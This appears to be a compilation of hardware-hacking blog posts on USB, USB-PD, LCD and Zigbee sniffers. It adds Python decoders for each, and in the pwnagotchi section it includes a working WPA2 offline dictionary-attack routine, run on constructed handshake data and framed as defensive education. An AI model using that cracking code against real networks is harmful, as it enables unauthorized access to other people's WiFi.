D+ and D- wires from a USB cable connected to GPIO pins on the Pi Pico, using a female header plugged onto the jumper wires

Need A USB Sniffer? Use Your Pico!

Ever wanted to sniff USB device communications? The usual path was buying an expensive metal box with USB connectors, using logic analyzers, or wiring devboards together and hacking some software to make them forward USB data.

Now, thanks to [ataradov]'s work, you can simply use a Pi Pico. Tap the D+ and D- lines of the link you want to watch, wire them (and ground) to the RP2040's GPIOs, and you can sniff the traffic between your computer and any low-speed (1.5 Mbps) or full-speed (12 Mbps) device. Then plug the Pico into your computer, open the virtual serial port it creates, and watch the USB packets stream in. The tap is purely passive, so it observes the bus without interfering with it. For the price of a Pico, you get an elegant USB sniffer, with only a little soldering required.
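What comes out of that serial port is the raw packet content, so the first thing you end up writing on the host is a decoder. The one below is an added example, not the Hackaday post's text or [ataradov]'s firmware: it takes each packet as the bytes between SYNC and EOP (PID first), validates the PID's complement nibble, splits token packets into address, endpoint and CRC5, and checks the CRC16 on data packets. The four sample packets are constructed for the example; their CRCs follow the USB 2.0 spec, so a real capture decodes the same way.

```python
# Added example, not the Hackaday post's or ataradov's code: a host-side decoder
# for the raw USB 2.0 low/full-speed packets a passive sniffer hands over, i.e.
# the bytes between SYNC and EOP, PID first. The four sample packets are
# constructed; their CRCs follow the USB 2.0 spec (CRC5 over the 11 token bits,
# CRC16 over the data payload), so a real capture decodes the same way.

from typing import Dict, List

PID_NAMES = {
    0x1: "OUT", 0x9: "IN", 0x5: "SOF", 0xD: "SETUP",
    0x3: "DATA0", 0xB: "DATA1", 0x7: "DATA2", 0xF: "MDATA",
    0x2: "ACK", 0xA: "NAK", 0xE: "STALL", 0x6: "NYET",
    0xC: "PRE/ERR", 0x8: "SPLIT", 0x4: "PING",
}
TOKEN_PIDS = {0x1, 0x9, 0xD, 0x5}      # OUT, IN, SETUP, SOF
DATA_PIDS = {0x3, 0xB, 0x7, 0xF}


def crc5_register(value: int, nbits: int) -> int:
    """Bit-serial CRC5 (x^5 + x^2 + 1, preset 0b11111) fed LSB first, the order
    the bits travel on the bus. Returns the raw shift register, uninverted."""
    crc = 0x1F
    for i in range(nbits):
        bit = (value >> i) & 1
        top = (crc >> 4) & 1
        crc = (crc << 1) & 0x1F
        if bit ^ top:
            crc ^= 0x05
    return crc


def crc5_field(value: int, nbits: int) -> int:
    """CRC5 as it sits in the upper 5 bits of the 16-bit token field: inverted
    and bit-reversed, because the CRC is sent MSB first while bytes go LSB first."""
    crc = crc5_register(value, nbits) ^ 0x1F
    return int(f"{crc:05b}"[::-1], 2)


def crc16_usb(data: bytes) -> int:
    """Reflected CRC16 (x^16 + x^15 + x^2 + 1, preset 0xFFFF, result inverted).
    The return value, as two little-endian bytes, is what follows the payload."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF


def decode_packet(pkt: bytes) -> Dict[str, object]:
    """Decode one packet: PID check, then token fields + CRC5 or payload + CRC16."""
    if not pkt:
        raise ValueError("empty packet")
    pid = pkt[0] & 0xF
    # The upper nibble must be the complement of the PID; anything else is a bit error.
    if (pkt[0] >> 4) ^ pid != 0xF:
        return {"pid": None, "error": "PID check failed", "raw": pkt.hex()}
    out: Dict[str, object] = {"pid": PID_NAMES.get(pid, f"0x{pid:X}")}
    if pid in TOKEN_PIDS:
        if len(pkt) != 3:
            return {**out, "error": "bad token length"}
        field = pkt[1] | (pkt[2] << 8)          # 11 payload bits, then 5 CRC bits
        if pid == 0x5:
            out["frame"] = field & 0x7FF         # SOF carries an 11-bit frame number
        else:
            out["addr"] = field & 0x7F           # 7-bit device address
            out["endp"] = (field >> 7) & 0xF     # 4-bit endpoint number
        # Residual check: the register run over data + CRC lands on 0b01100.
        out["crc_ok"] = crc5_register(field, 16) == 0x0C
    elif pid in DATA_PIDS:
        if len(pkt) < 3:
            return {**out, "error": "bad data length"}
        data, wire_crc = pkt[1:-2], pkt[-2] | (pkt[-1] << 8)
        out["data"] = data.hex()
        out["crc_ok"] = crc16_usb(data) == wire_crc
    elif len(pkt) != 1:                           # handshakes are the PID alone
        return {**out, "error": "handshake packet with trailing bytes"}
    return out


def decode_stream(packets: List[bytes]) -> List[Dict[str, object]]:
    return [decode_packet(p) for p in packets]


# Constructed capture: four packets of the kind seen during enumeration, a
# SETUP token to the default address, a zero-length DATA0, an ACK, and an IN
# token to address 1.
SAMPLE_CAPTURE = [
    bytes.fromhex("2D0010"),   # SETUP  addr 0, endp 0
    bytes.fromhex("C30000"),   # DATA0, zero-length payload, CRC16 0x0000
    bytes.fromhex("D2"),       # ACK
    bytes.fromhex("6901E8"),   # IN     addr 1, endp 0
]

if __name__ == "__main__":
    for entry in decode_stream(SAMPLE_CAPTURE):
        print(entry)
```

The bit-order handling is the part that trips people up: USB sends each byte LSB first but the CRC MSB first, so the CRC5 ends up bit-reversed in the top of the token field, and the residual check sidesteps that by simply running the register over all sixteen bits.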

[ataradov] also offers a complete board design with an RP2040 and a USB hub on it, equipped with USB sockets that free you from the soldering entirely; it's an open-source KiCad design, so you can simply order some sniffers from your favourite fab. This project is a great learning tool, it's about as cheap and easy to make as a sniffer can be, and it has big potential for reverse-engineering old and new systems alike. Couple this hack with another Pico doing USB device or host duty, get up to date with USB reverse-engineering fundamentals, and you could build a Facedancer-like tool with ease.

Need to reach 480 Mbit/s? [ataradov] has a wonderful board for that as well, which we covered last year. It's well worth it if a device of yours only speaks the highest speed USB 2 offers, and it comes with Wireshark support. Want Wireshark support on a Pico? Here's a GitHub project by another hacker, [tana]. By now, merely having a Pi Pico gives you so many tools, it's not even funny.

We thank [Julianna] for sharing this with us!

Freshening Up Google’s USB-C PD Sniffer

USB-C Power Delivery has definitely made the big mess of wires a bit smaller, but not all cables are created equal: a plain USB-C cable is only rated for 3 A (60 W at 20 V), while one rated for 5 A and 100 W (240 W with the newer Extended Power Range) has to carry an electronic marker chip that tells both ends what it can handle. That turns a passive-looking cable into a device with a hidden chip in it, and one more party in the negotiation.

[Greg Davill] has decided to unravel the mystery of why your laptop isn't charging by creating a USB-PD sniffer. Based on Google's Twinkie sniffer, the FreshTwinkie makes the design more accessible by reducing the number of layers in the PCB and replacing the BGA variant of the STM32 with a more DIY-friendly QFN version. Interestingly, this isn't the first time we've seen somebody try to simplify the Twinkie; back in 2021, the Twonkie from [dojoe] hit a number of similar notes.

Power negotiation is not the only thing that travels over the CC pins: Alternate Mode entry (DisplayPort, Thunderbolt) is negotiated with PD vendor-defined messages on the same line, so a sniffer like the FreshTwinkie can show whether a mode was requested and whether the other side accepted it. With future development, it could provide useful information as to why a Thunderbolt 4 or tunneled PCIe device isn't working correctly.

Google-Inspired USB-PD Sniffer For The DIY Crowd

If you want to hack around with the communication protocol that USB Power Delivery devices use to negotiate their power requirements with the upstream source, a tool like Google’s Twinkie really helps. With it you can sniff data off the line, analyze it, and even inject your own packets. Luckily for us, the search giant made the device open source so we can all have one of our own.

Unfortunately, as [dojoe] found out, the Twinkie isn’t particularly well suited for small-scale hobbyist manufacturing. So he came up with a revised design he calls Twonkie that replaces the six layer PCB with a much more reasonable four layer version that can be manufactured cheaply by OSHPark, and swaps out the BGA components with QFP alternatives you can hand solder.

That said, it's still likely to be a challenging build for the home gamer. There are quite a few 0402 passives on there, and while those are doable with an iron, it can certainly be tricky. To take some pressure off, [dojoe] says he tried to optimize the board layout as much as possible for hand assembly. He was even able to avoid needing hot air by straddling the PCB with USB-C connectors intended for vertical mounting.

Given the current chip shortage, [dojoe] says the biggest problem might actually be getting your hands on the STM32F072CB microcontroller at the Twonkie's core. To that end, the board supports both TQFP44 and QFN44 footprints, and you can even use an STM32F072C8 at the cost of some functionality. With a bit of luck, you'll find a chip that works in the parts bin.
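Whichever of the two boards above you build, what you get out of it is the stream of PD messages on the CC line, and the reason a laptop sits at 5 V is almost always visible in two of them: the charger's Source_Capabilities and the laptop's Request. The decoder below is an added example, not code from Google's Twinkie, the FreshTwinkie or the Twonkie: it takes a message after the sniffer has stripped preamble, SOP, 4b5b coding and CRC, splits the 16-bit header, decodes the Power Data Objects in an offer and the Request Data Object in the reply, and works out the contract the two ends agreed. The charger offering 5 V/3 A and 9 V/3 A and the sink requesting object 2 at 2 A are constructed sample messages.

```python
# Added example, not code from Google's Twinkie or the FreshTwinkie/Twonkie
# boards: decoding the USB Power Delivery messages a CC-line sniffer captures.
# Input is a message after the sniffer has stripped the preamble, SOP ordered
# set, 4b5b coding and CRC: a 16-bit header followed by up to seven 32-bit
# data objects, all little-endian. The two sample messages are constructed.

from typing import Dict, List

CONTROL_TYPES = {1: "GoodCRC", 2: "GotoMin", 3: "Accept", 4: "Reject", 5: "Ping",
                 6: "PS_RDY", 7: "Get_Source_Cap", 8: "Get_Sink_Cap", 9: "DR_Swap",
                 10: "PR_Swap", 11: "VCONN_Swap", 12: "Wait", 13: "Soft_Reset"}
DATA_TYPES = {1: "Source_Capabilities", 2: "Request", 3: "BIST",
              4: "Sink_Capabilities", 15: "Vendor_Defined"}


def decode_header(hdr: int) -> Dict[str, object]:
    """Message header, PD 3.0 field layout (message type is 4 bits wide in PD 2.0)."""
    ndo = (hdr >> 12) & 0x7
    msg_type = hdr & 0x1F
    names = DATA_TYPES if ndo else CONTROL_TYPES     # same numbers, two namespaces
    return {
        "extended": bool(hdr >> 15),
        "num_data_objects": ndo,
        "message_id": (hdr >> 9) & 0x7,
        "power_role": "Source" if (hdr >> 8) & 1 else "Sink",
        "spec_revision": f"{((hdr >> 6) & 0x3) + 1}.0",   # 0b01 = PD 2.0, 0b10 = PD 3.0
        "data_role": "DFP" if (hdr >> 5) & 1 else "UFP",
        "message_type": names.get(msg_type, f"type {msg_type}"),
    }


def decode_pdo(pdo: int) -> Dict[str, object]:
    """One Power Data Object from a Source_Capabilities message."""
    kind = pdo >> 30
    if kind == 0:                                     # Fixed supply
        return {"type": "Fixed",
                "voltage_mV": ((pdo >> 10) & 0x3FF) * 50,
                "max_current_mA": (pdo & 0x3FF) * 10,
                "dual_role_power": bool(pdo & (1 << 29)),
                "usb_suspend_supported": bool(pdo & (1 << 28)),
                "unconstrained_power": bool(pdo & (1 << 27)),
                "usb_comms_capable": bool(pdo & (1 << 26)),
                "dual_role_data": bool(pdo & (1 << 25))}
    if kind == 1:                                     # Battery
        return {"type": "Battery",
                "max_voltage_mV": ((pdo >> 20) & 0x3FF) * 50,
                "min_voltage_mV": ((pdo >> 10) & 0x3FF) * 50,
                "max_power_mW": (pdo & 0x3FF) * 250}
    if kind == 2:                                     # Variable supply
        return {"type": "Variable",
                "max_voltage_mV": ((pdo >> 20) & 0x3FF) * 50,
                "min_voltage_mV": ((pdo >> 10) & 0x3FF) * 50,
                "max_current_mA": (pdo & 0x3FF) * 10}
    return {"type": "Augmented (PPS)",                # P D 3.0 programmable supply
            "max_voltage_mV": ((pdo >> 17) & 0xFF) * 100,
            "min_voltage_mV": ((pdo >> 8) & 0xFF) * 100,
            "max_current_mA": (pdo & 0x7F) * 50}


def decode_rdo(rdo: int) -> Dict[str, object]:
    """Request Data Object for a Fixed or Variable PDO (object positions are 1-based)."""
    return {"object_position": (rdo >> 28) & 0x7,
            "giveback": bool(rdo & (1 << 27)),
            "capability_mismatch": bool(rdo & (1 << 26)),
            "operating_current_mA": ((rdo >> 10) & 0x3FF) * 10,
            "max_operating_current_mA": (rdo & 0x3FF) * 10}


def decode_message(raw: bytes) -> Dict[str, object]:
    if len(raw) < 2 or (len(raw) - 2) % 4:
        raise ValueError("PD message is a 2-byte header plus 4-byte data objects")
    hdr = int.from_bytes(raw[:2], "little")
    info = decode_header(hdr)
    ndo = (hdr >> 12) & 0x7
    if 2 + 4 * ndo != len(raw):
        raise ValueError("object count in header does not match message length")
    objs = [int.from_bytes(raw[2 + 4 * i:6 + 4 * i], "little") for i in range(ndo)]
    if info["message_type"] == "Source_Capabilities":
        info["objects"] = [decode_pdo(o) for o in objs]
    elif info["message_type"] == "Request":
        info["objects"] = [decode_rdo(o) for o in objs]
    else:
        info["objects"] = [f"0x{o:08X}" for o in objs]
    return info


def contract(source_caps: Dict[str, object], request: Dict[str, object]) -> Dict[str, object]:
    """Resolve a Request against the offer (Fixed PDOs): the voltage and current agreed."""
    rdo = request["objects"][0]
    pdo = source_caps["objects"][rdo["object_position"] - 1]
    return {"voltage_mV": pdo["voltage_mV"],
            "current_mA": rdo["operating_current_mA"],
            "power_W": pdo["voltage_mV"] * rdo["operating_current_mA"] / 1e6,
            "capability_mismatch": rdo["capability_mismatch"]}


# Constructed sample exchange: a charger offering 5 V/3 A and 9 V/3 A, and a
# sink asking for object 2 at 2 A (contract: 9 V, 2 A, 18 W).
SOURCE_CAPS = bytes.fromhex("6121" "2C910124" "2CD10200")
REQUEST = bytes.fromhex("4210" "2C210320")

if __name__ == "__main__":
    print(decode_message(SOURCE_CAPS))
    print(contract(decode_message(SOURCE_CAPS), decode_message(REQUEST)))
```

When a laptop refuses to charge from a supply that looks fine, the capability_mismatch bit in its Request and the list of PDOs actually offered are the two things to read first; a charger that never offers 20 V, or a sink that asks for more current than the chosen PDO allows, shows up right there.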

A Tamagotchi For WiFi Cracking

OK, let's start this one by saying that it's useful to know how to break security measures in order to understand how to better defend yourself, and that you shouldn't attack any network you don't own or have permission to test. That being said, if you want to learn about security and the weaknesses in the WPA standard, there's no better way to do it than with a tool that mimics the behavior of a Tamagotchi.

Called the pwnagotchi, this package of artificial intelligence captures the WPA handshakes and PMKIDs of nearby networks, the key material an offline dictionary attack on the passphrase needs. It uses reinforcement learning to tune its own parameters in order to maximize the amount of useful material it collects from whatever environment you happen to place it in. As an interesting design choice, the pwnagotchi behaves like an old Tamagotchi pet would, acting happy when it gets the inputs it needs.

This project is beyond a novelty though and goes deep in the weeds of network security. If you're at all interested in the ways in which your own networks might be at risk, this might be a tool you can use to learn a little more about the ways of encryption, general security, and AI to boot. Of course, if you're new to the network security world, secure your own networks first: a captured handshake only pays off if the passphrase falls to guessing, so a long random passphrase, or WPA3 where your gear supports it, takes that away.
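To see why a handshake is worth collecting, it helps to watch the offline side of the attack. The code below is an added example, not pwnagotchi's code: given the SSID, both MAC addresses, both nonces and the second EAPOL-Key frame of a WPA2 4-way handshake (all of which are sent in the clear), it derives the PMK from a candidate passphrase with PBKDF2, expands it to the Key Confirmation Key, and checks whether that key reproduces the MIC the station sent. The handshake material for a network called lab-ap is constructed here with the same functions; the only real test vector is the PMK for passphrase "password" on SSID "IEEE" from the IEEE 802.11 standard's annex.

```python
# Added example, not pwnagotchi's code: what a captured WPA2 4-way handshake
# gives an attacker, and why. Everything needed to test passphrase guesses
# offline is sent in the clear: SSID, the two MAC addresses, both nonces and
# the MIC on message 2. The handshake below is constructed for the example;
# the only real test vector is the PMK for passphrase "password" on SSID
# "IEEE" from the IEEE 802.11 standard's annex, checked in the test.

import hashlib
import hmac
from typing import List, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_handshake(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max MACs || min/max nonces);
    its first 16 bytes are the Key Confirmation Key that authenticates the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field (offset 81, 16 bytes)
    zeroed. Descriptor version 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def check_passphrase(candidate: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                     anonce: bytes, snonce: bytes, eapol_msg2: bytes) -> bool:
    """True if the candidate reproduces the MIC the station sent in message 2."""
    key_version = eapol_msg2[6] & 0x7              # low bits of Key Information
    kck = kck_from_handshake(pmk_from_passphrase(candidate, ssid),
                             ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, eapol_msg2, key_version), eapol_msg2[81:97])


def dictionary_attack(wordlist: List[str], ssid: str, ap_mac: bytes, sta_mac: bytes,
                      anonce: bytes, snonce: bytes, eapol_msg2: bytes) -> Optional[str]:
    """The offline part: no packets, no AP, just one PBKDF2 per guess (the 4096
    rounds are the only thing slowing this down)."""
    for word in wordlist:
        if check_passphrase(word, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2):
            return word
    return None


def build_eapol_msg2(kck: bytes, snonce: bytes, key_version: int = 2) -> bytes:
    """Constructed message 2 (station to AP) with a valid MIC, used for the sample."""
    key_info = (0x0008 | 0x0100 | key_version).to_bytes(2, "big")   # pairwise, MIC set
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # IV, RSC, Key ID
            + b"\x00" * 16 + (0).to_bytes(2, "big"))                 # MIC placeholder, data len
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body        # 802.1X v2, EAPOL-Key
    return frame[:81] + eapol_mic(kck, frame, key_version) + frame[97:]


# Constructed handshake material for a network called lab-ap.
SSID = "lab-ap"
AP_MAC = bytes.fromhex("02a1b2c3d4e5")
STA_MAC = bytes.fromhex("021122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = build_eapol_msg2(
    kck_from_handshake(pmk_from_passphrase("correct horse", SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
    SNONCE)

if __name__ == "__main__":
    print(dictionary_attack(["password", "letmein", "correct horse"],
                            SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2))
```

Nothing in that loop touches the network again, which is the whole point: once the handshake is on disk, the only defence left is a passphrase that isn't in any wordlist, and WPA3's SAE exchange removes this offline check altogether.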

Thanks to [Itay] for the tip!

The Bluetooth LCD Sniffer You Didn’t Know You Needed

At one time or another, we’ve all suffered through working with a piece of equipment that didn’t feature a way to export its data to another device. Whether it was just too old to offer such niceties, or the manufacturer locked the capability behind some upgrade, the pain of staring at digits ticking over on a glowing LCD display and wishing there was a practical way to scrape what our eyes were seeing is well known to hackers.

That was precisely the inspiration for DoMSnif, the dot matrix LCD sniffer that [Blecky] has been working on. Originally the project started as a way to record the temperature of his BRTRO-420 reflow oven, but realizing that such a device could have widespread appeal to other hardware hackers, he’s rightfully decided to enter it into the 2019 Hackaday Prize. If perfected, it could be an excellent way to bolt data capture capabilities to your older devices.

The first phase of this project was figuring out how to capture and parse the signals going into the device's KS0108 LCD. Getting the data was easy enough: the KS0108 takes an 8-bit parallel bus plus data/instruction, read/write, enable and chip-select lines, so he just had to hook a logic analyzer up between the display and the main board of the device. Figuring out what it all means is a different story.

After running the oven for a bit with the analyzer recording, [Blecky] had more than enough data to get started on decoding it. Luckily, the layout of this fairly common 128×64 pixel display is well documented and easy enough to understand. With a little work, he was able to create a tool that would import the captured data and display it on a virtual LCD.
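The virtual LCD is the part worth spelling out, because a KS0108 controller keeps its own address registers and the decoder has to track them exactly as the silicon does. The code below is an added example, not [Blecky]'s DoMSnif: it models the two 64-column controller halves of a 128×64 panel, each with eight pages of eight pixel rows, applies the sniffed command and data bytes to them, and reproduces the picture. The bus strobes it consumes are constructed, in the form a logic analyzer export would give after picking out the bus lines on each enable edge; they light a few pixels and exercise the column auto-increment wrap that a decoder has to get right.

```python
# Added example, not Blecky's DoMSnif code: rebuilding the picture on a 128x64
# KS0108 display from sniffed bus strobes. The panel is two 64-column
# controllers (CS1 and CS2), each holding 8 pages of 8 pixel rows, and the host
# sends one byte per E strobe that is a command (D/I low) or display data
# (D/I high). The strobes below are constructed; they light a few pixels and
# exercise the column auto-increment wrap that a decoder has to get right.

from typing import List, Tuple

# One captured E strobe: (cs1, cs2, di, data). R/W is assumed low (host write).
Strobe = Tuple[int, int, int, int]


class KS0108Half:
    """One 64x64 controller: page (X), column (Y) and start line (Z) registers plus RAM."""

    def __init__(self) -> None:
        self.page = 0            # X address, 0..7, one 8-row page each
        self.col = 0             # Y address, 0..63, auto-increments on data access
        self.start_line = 0      # Z address: RAM row shown at the top of the screen
        self.on = False
        self.ram = [[0] * 64 for _ in range(8)]   # ram[page][col]: bit 0 = top row

    def command(self, c: int) -> None:
        if (c & 0xFE) == 0x3E:       # 0011111D  display on/off
            self.on = bool(c & 1)
        elif (c & 0xC0) == 0x40:     # 01YYYYYY  set column address
            self.col = c & 0x3F
        elif (c & 0xF8) == 0xB8:     # 10111XXX  set page address
            self.page = c & 0x07
        elif (c & 0xC0) == 0xC0:     # 11ZZZZZZ  set display start line
            self.start_line = c & 0x3F

    def data(self, d: int) -> None:
        self.ram[self.page][self.col] = d & 0xFF
        self.col = (self.col + 1) & 0x3F          # 63 wraps to 0; the page does not advance


class KS0108Panel:
    def __init__(self) -> None:
        self.halves = (KS0108Half(), KS0108Half())

    def feed(self, strobes: List[Strobe]) -> None:
        for cs1, cs2, di, data in strobes:
            for selected, half in zip((cs1, cs2), self.halves):
                if not selected:
                    continue                      # hosts often select both for display on/off
                if di:
                    half.data(data)
                else:
                    half.command(data)

    def pixel(self, x: int, y: int) -> int:
        """1 if column x (0..127), row y (0..63) is lit on the visible screen."""
        half = self.halves[x // 64]
        row = (y + half.start_line) & 0x3F       # start line scrolls RAM vertically
        return (half.ram[row // 8][x % 64] >> (row % 8)) & 1

    def render(self) -> List[str]:
        """ASCII dump, one string per screen row, '#' for lit pixels."""
        return ["".join("#" if self.pixel(x, y) else "." for x in range(128)) for y in range(64)]


# Constructed capture, one tuple per falling edge of E.
SAMPLE_CAPTURE: List[Strobe] = [
    (1, 1, 0, 0x3F),        # both halves: display on
    (1, 1, 0, 0xC0),        # both halves: start line 0
    (1, 0, 0, 0xB8 | 2),    # left half: page 2 (rows 16..23)
    (1, 0, 0, 0x40 | 62),   # left half: column 62
    (1, 0, 1, 0x01),        # col 62: bit 0 -> pixel (62, 16)
    (1, 0, 1, 0x80),        # col 63: bit 7 -> pixel (63, 23)
    (1, 0, 1, 0x18),        # column wrapped to 0: bits 3,4 -> pixels (0, 19) and (0, 20)
    (0, 1, 0, 0xB8 | 7),    # right half: page 7 (rows 56..63)
    (0, 1, 0, 0x40 | 0),    # right half: column 0, i.e. screen column 64
    (0, 1, 1, 0xFF),        # full column segment lit: pixels (64, 56..63)
]


def decode_capture(strobes: List[Strobe]) -> KS0108Panel:
    panel = KS0108Panel()
    panel.feed(strobes)
    return panel


if __name__ == "__main__":
    print("\n".join(decode_capture(SAMPLE_CAPTURE).render()))
```

Feeding a real export through this is mostly a matter of mapping the analyzer's channel columns onto the (cs1, cs2, di, data) tuples; once the picture matches the physical screen, the firmware's font and digit positions can be read straight off the reconstructed bitmap.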

Unfortunately, the Bluetooth part is where things get tricky. Ultimately, [Blecky] wants to ditch the logic analyzer and use an Adafruit Feather nRF52 Bluefruit to capture the signals going to the LCD and pipe them to a waiting device over Bluetooth. But his testing has found that the nRF52's radio is simply too slow for that approach: the display receives a new byte every 14 µs, while the radio takes at least 50 µs to send a packet.

[Blecky] is looking at ways around this problem, and we’re confident he’ll crack it. The solution could be in buffering and compressing the data before sending it out, though you’d lose the ability to monitor the display in real-time. Even if he has to abandon the Bluetooth aspect entirely and make the device wired, we still think there would be a market for an easy to use hardware and software solution for scraping LCD data.

Drone Gives Up Its Wireless Secrets To Zigbee Sniffer

There’s something thrilling about decoding an unknown communications protocol. You start with a few clues, poke at the problem with some simple tools, and eventually work your way up to that first breakthrough that lets you crack the code. It can be frustrating, but when you eventually win, it can be very rewarding.

It seems that [Jason] learned this while decoding the wireless conversation between his mass-market quad and its controller. The quad in question, a Yuneec Q500, is one of those mid-range, ready-to-fly drones that’s targeted at those looking to get in the air easily and take some cool pictures. Unsure how the drone and controller were talking, [Jason] popped the covers and found a Zigbee chipset within. With the help of a $14 Zigbee USB dongle and some packet sniffing software from TI, [Jason] was able to see packets flowing, but decoding them was laborious. Luckily, the sniffer app can be set up to stream packets to another device, so [Jason] wrote a program to receive and display packets. He used that to completely characterize each controller input and the data coming back from the drone. It’s a long and strange toolchain, but the upshot is that he’s now able to create KML in real time and track the drone on Google Earth as it flies. The video below shows the build and a few backyard test flights.

Congratulations to [Jason] for breaking the protocol and opening up drones like this for other hackers. If you’re interested in learning more about Zigbee sniffing, you can actually hack a few smarthome gadgets into useful sniffers.
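Under the Zigbee traffic between the Q500 and its controller sits plain IEEE 802.15.4, and that is the layer a sniffer dongle streams out. The parser below is an added example, not [Jason]'s tool: it takes each captured frame, decodes the frame control field, sequence number and addressing fields of the MAC header, verifies the frame check sequence (the 16-bit ITU-T CRC with a zero preset that 802.15.4 uses), and hands back the payload for the kind of per-field characterization described above. The data frame and acknowledgement it parses are constructed with the builder functions in the block.

```python
# Added example, not Jason's tool: parsing the IEEE 802.15.4 frames that a
# Zigbee sniffer dongle streams out, which is the layer under the drone's
# Zigbee traffic. A frame is MAC header, payload and a 2-byte FCS; the FCS is
# the 16-bit ITU-T CRC (polynomial 0x1021 in reflected form, zero preset, no
# final XOR). The two sample frames are constructed with the builders below.

from typing import Dict, List

FRAME_TYPES = {0: "Beacon", 1: "Data", 2: "Ack", 3: "MAC command"}


def fcs(data: bytes) -> int:
    """IEEE 802.15.4 frame check sequence over MHR + payload."""
    crc = 0x0000
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc


def parse_frame(frame: bytes) -> Dict[str, object]:
    """Decode the MAC header (frame version 0/1, no security header) and check the FCS."""
    if len(frame) < 5:
        raise ValueError("frame too short")
    body, wire_fcs = frame[:-2], int.from_bytes(frame[-2:], "little")
    fcf = int.from_bytes(body[0:2], "little")        # Frame Control Field
    info: Dict[str, object] = {
        "frame_type": FRAME_TYPES.get(fcf & 0x7, "Reserved"),
        "security_enabled": bool(fcf & 0x0008),
        "frame_pending": bool(fcf & 0x0010),
        "ack_request": bool(fcf & 0x0020),
        "pan_id_compression": bool(fcf & 0x0040),
        "seq": body[2],
        "fcs_ok": fcs(body) == wire_fcs,
    }
    dst_mode, src_mode = (fcf >> 10) & 0x3, (fcf >> 14) & 0x3   # 0 none, 2 short, 3 extended
    pos = 3
    if dst_mode:
        info["dst_pan"] = int.from_bytes(body[pos:pos + 2], "little")
        pos += 2
        n = 2 if dst_mode == 2 else 8
        info["dst"] = body[pos:pos + n][::-1].hex()    # addresses are little-endian on air
        pos += n
    if src_mode:
        if not (fcf & 0x0040):                         # source PAN only if not compressed
            info["src_pan"] = int.from_bytes(body[pos:pos + 2], "little")
            pos += 2
        n = 2 if src_mode == 2 else 8
        info["src"] = body[pos:pos + n][::-1].hex()
        pos += n
    info["payload"] = body[pos:].hex()
    return info


def build_data_frame(seq: int, pan: int, dst: int, src: int, payload: bytes) -> bytes:
    """Data frame with short addresses, PAN ID compression and ACK request (FCF 0x8861)."""
    fcf = 0x0001 | 0x0020 | 0x0040 | (2 << 10) | (2 << 14)
    body = (fcf.to_bytes(2, "little") + bytes([seq]) + pan.to_bytes(2, "little")
            + dst.to_bytes(2, "little") + src.to_bytes(2, "little") + payload)
    return body + fcs(body).to_bytes(2, "little")


def build_ack(seq: int) -> bytes:
    """Ack frame: FCF, sequence number and FCS only, no addresses."""
    body = (0x0002).to_bytes(2, "little") + bytes([seq])
    return body + fcs(body).to_bytes(2, "little")


def parse_capture(frames: List[bytes]) -> List[Dict[str, object]]:
    return [parse_frame(f) for f in frames]


# Constructed capture: one data frame from node 0x1234 to the coordinator
# (short address 0x0000) on PAN 0x1A62, and the coordinator's Ack.
SAMPLE_CAPTURE = [
    build_data_frame(0x5A, 0x1A62, 0x0000, 0x1234, bytes.fromhex("010203")),
    build_ack(0x5A),
]

if __name__ == "__main__":
    for entry in parse_capture(SAMPLE_CAPTURE):
        print(entry)
```

The FCS check matters more than it looks: a sniffer that sits some distance from both ends picks up plenty of corrupted frames, and a byte that changed in the air would otherwise be logged as a control input that never happened. The payload this returns is the Zigbee NWK layer, which is where the per-input mapping starts.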


Sniffing RFID Readers With A Piece Of Paper

We feature plenty of printed projects here on Hackaday, though they tend to be of the three dimensional type thanks to the proliferation of affordable 3D printers. But in this case, [Milosch Meriac] has managed to put together a printable design that’s not only a very cool hack, but is made up of a scant two dimensions. His creation, which could perhaps be considered something of an interactive circuit diagram, allows anyone with a paper printer and a few passive components to make a functional low-frequency RFID sniffer.

[Milosch] tells us the goal of the project is to lower the barrier for experimenting with the RFID technology that’s increasingly part of our everyday lives. Rather than having to use something expensive and complicated such as an oscilloscope, experimenters can simply plug their DIY RFID sniffer into their computer’s line-in jack and explore the produced waveform with open source tools.

